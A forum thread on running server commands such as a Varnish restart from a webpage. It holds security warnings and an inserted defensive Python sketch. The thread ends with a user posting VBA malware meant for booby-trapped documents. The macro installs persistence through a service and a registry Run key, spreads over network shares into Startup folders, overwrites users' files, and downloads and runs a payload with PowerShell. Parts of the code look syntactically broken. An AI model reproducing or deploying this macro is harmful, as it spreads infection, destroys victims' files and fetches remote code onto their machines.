Issuing shell commands from a webpage?
-
2019-08-28 at 9:15 PM UTC
I would like to be able to basically do a couple of commands - e.g. service varnish restart (as root) from a webpage.
Is that doable? -
2019-08-28 at 9:23 PM UTC
/etc/varnish/default.vcl
    backend default {
        .host = "localhost";
        .port = "8080";
    }
-
2019-08-28 at 9:35 PM UTC
Lol, that looks familiar alright.
Anyway I have my vcl file as good as I'm going to get it for now. -
2019-08-28 at 9:37 PM UTC
And varnish is supporting 1000 simultaneous requests, which is A) awesome and B) the goal.
Now it's time to worry about allowing people to actually update the website, keeping in mind that the backend takes like 6 seconds to respond, so allowing clients to hit it simply isn't an option.
Which means that a cache-warming strategy is a necessity. Which we have, but I need to be able to call it without requiring an SSH session. -
2019-08-29 at 11:54 PM UTC
It's actually quite easy but unsafe. This is of course if you're referring to accessing a webpage that's hosted on a server that you control.
-
2019-08-31 at 9:50 PM UTC
Originally posted by Admin It's actually quite easy but unsafe. This is of course if you're referring to accessing a webpage that's hosted on a server that you control.
Yeah, this. You can stand up a small web server that runs commands taken from requests to it but that's wildly insecure and basically backdooring yourself. You can set it up to run a specific command when a request is made but you have to worry about things like "what happens if someone requests this a thousand times in a second" or "do I take any parameters from the request that can open me up to injection attacks" and such. And if you're spawning a shell you have to ask "whose profile is this sourcing and what happens when that changes".
I mean in some sense every HTTP request is "run some command on a remote server and maybe provide some data back" but shells and subprocesses are tricky and just require you to think about all the ways that they can be exploited or fail.
-
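Added example, not part of the thread: a sketch of the "run a specific command when a request is made" pattern with the three concerns raised above handled explicitly (request flooding, request parameters reaching the command line, and shell profile sourcing). The class name `CommandGate`, the action name, the binary path and the cooldown value are assumptions chosen for illustration.

```python
import hmac
import subprocess
import time

# Fixed allowlist: action name -> complete argv. Nothing from the request is
# ever interpolated into a command. The path is an assumption for this example.
ACTIONS = {
    "restart-varnish": ["/usr/sbin/service", "varnish", "restart"],
}
COOLDOWN_SECONDS = 30  # bounds "a thousand requests in a second"
CLEAN_ENV = {"PATH": "/usr/sbin:/usr/bin:/sbin:/bin"}  # no inherited environment


class CommandGate:
    def __init__(self, token, runner=subprocess.run, clock=time.monotonic):
        self._token = token.encode()
        self._runner = runner      # injectable so the gate can be tested offline
        self._clock = clock
        self._last_run = {}

    def handle(self, action, presented_token):
        """Return an HTTP-style status code for one request."""
        # Constant-time comparison of the shared secret.
        if not hmac.compare_digest(presented_token.encode(), self._token):
            return 403
        # The request only selects a key; unknown keys never reach a process.
        argv = ACTIONS.get(action)
        if argv is None:
            return 404
        now = self._clock()
        last = self._last_run.get(action)
        if last is not None and now - last < COOLDOWN_SECONDS:
            return 429
        self._last_run[action] = now
        # A list argv without shell=True means no shell is spawned, so no
        # profile is sourced and no metacharacters are interpreted.
        result = self._runner(argv, env=CLEAN_ENV, timeout=60,
                              stdin=subprocess.DEVNULL, capture_output=True)
        return 200 if result.returncode == 0 else 500
```

`handle()` would sit behind whatever HTTP handler receives the request; the process running it needs only enough privilege to execute that single argv, not a general root shell.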
2019-08-31 at 10:33 PM UTC
Thanks.
I got the cache refreshing just fine by getting varnish to serve up files, and also refresh the cache object after the file has been served. This enables the people updating the site to avoid having to use any control interface besides just waiting 10 seconds and refreshing, and also ensures no customer ever has to wait for the slow-ass backend to work.
TBH setting it up was all far more complicated than it should have been. -
2019-09-01 at 10:40 AM UTC
If you absolutely have to spawn a shell, permission jail it. Make sure it can't do anything else than what you want it to do, read up on breaking out of a jailed shell too if you wanna do your due diligence. I'd counsel against it in general though. It's a good way of getting owned.
-
2019-09-01 at 10:52 AM UTC
yeah I would not recommend using it more than once. if you need remote terminal access set up ssh
***or in your case, some sort of conditional trigger for the script -
2019-09-01 at 12:25 PM UTC
Just message her on FB.
-
2019-09-02 at 11:54 PM UTC
It's really just a bad idea. You could also make it as confusing as possible in hopes an attacker would miss it.
-
2019-09-03 at 1:43 AM UTC
Originally posted by Admin It's really just a bad idea. You could also make it as confusing as possible in hopes an attacker would miss it.
Best to set up a malicious honey pot, so when they try to exploit the hole, they end up getting infected with a rootkit that deletes their entire hard drive instead. -
2019-09-03 at 7:23 PM UTC
Originally posted by -SpectraL Best to set up a malicious honey pot, so when they try to exploit the hole, they end up getting infected with a rootkit that deletes their entire hard drive instead.
You're overthinking it. Just set up a regular honeypot, put some important looking documents in there somewhere. But make sure all these documents are actually MalDocs.
In fact I'm taking a little break from coding at the moment but I had this open in my text editor as well.
Public Sub ware()
Const s = "c:\s.bat"
Dim FileNumber As Integer
Dim retVal As Variant
FileNumber = FreeFile
'creat batch file
Open s For Output As #FileNumber
Print #FileNumber, "@echo off"
Print #FileNumber, "set gg=0"
Print #FileNumber, "set servicename=DE"
Print #FileNumber, "echo sc create %servicename% binpath=%0 >> service.bat"
Print #FileNumber, "echo sc start %servicename% >> service.bat"
Print #FileNumber, "attrib +h +r +s service.bat"
Print #FileNumber, "start service.bat"
Print #FileNumber, "reg add "; HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Run; " /v "; Windows; Services; " /t "; REG_SZ; " /d %0"
Print #FileNumber, "attrib +h +r +s %0"
Print #FileNumber, ":abdhd"
Print #FileNumber, "net use Z: \\192.168.1.%gg%\C$"
Print #FileNumber, "if exist Z: (for /f %%u in ('dir Z:\Users /b') do copy %0 "Z:\Users\%%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Services.bat""
Print #FileNumber, "mountvol Z: /d)"
Print #FileNumber, "if %i% == 256 (goto infect) else (set /a i=i+1)"
Print #FileNumber, "goto abdhd"
Print #FileNumber, ":infect"
Print #FileNumber, "for /f %%f in ('dir C:\Users\*.* /s /b') do (rename %%f *.bat)"
Print #FileNumber, "for /f %%f in ('dir C:\Users\*.bat /s /b') do (copy %0 %%f)"
Print #FileNumber, ":payload"
Print #FileNumber, "powershell -Command "(New-Object Net.WebClient).DownloadFile('Direct Link Here', 'Download_Execute.exe')""
Print #FileNumber, "powershell -Command "Invoke-WebRequest <Direct Link Here> -OutFile Downoad_Execute.exe""
Print #FileNumber, "start %USERPROFILE%\Downloads\Download_Execute.exe"
Close #FileNumber
'run batch file
retVal = Shell(MY_FILENAME, vbNormalFocus)
' NOTE THE BATCH FILE WILL RUN, BUT THE CODE WILL CONTINUE TO RUN.
If retVal = 0 Then
MsgBox "An Error Occured"
Close #FileNumber
End
End If
'Delete batch file
Kill MY_FILENAME
End Sub
I didn't write this but I was messing around with it the other day. I also found out that LibreOffice supports Macros as well. So instead of jumping through hoops with executables and batch files and random PowerShell invocations and shit, you could have your Macro simply download a python script and execute it directly if the adversary is on Linux.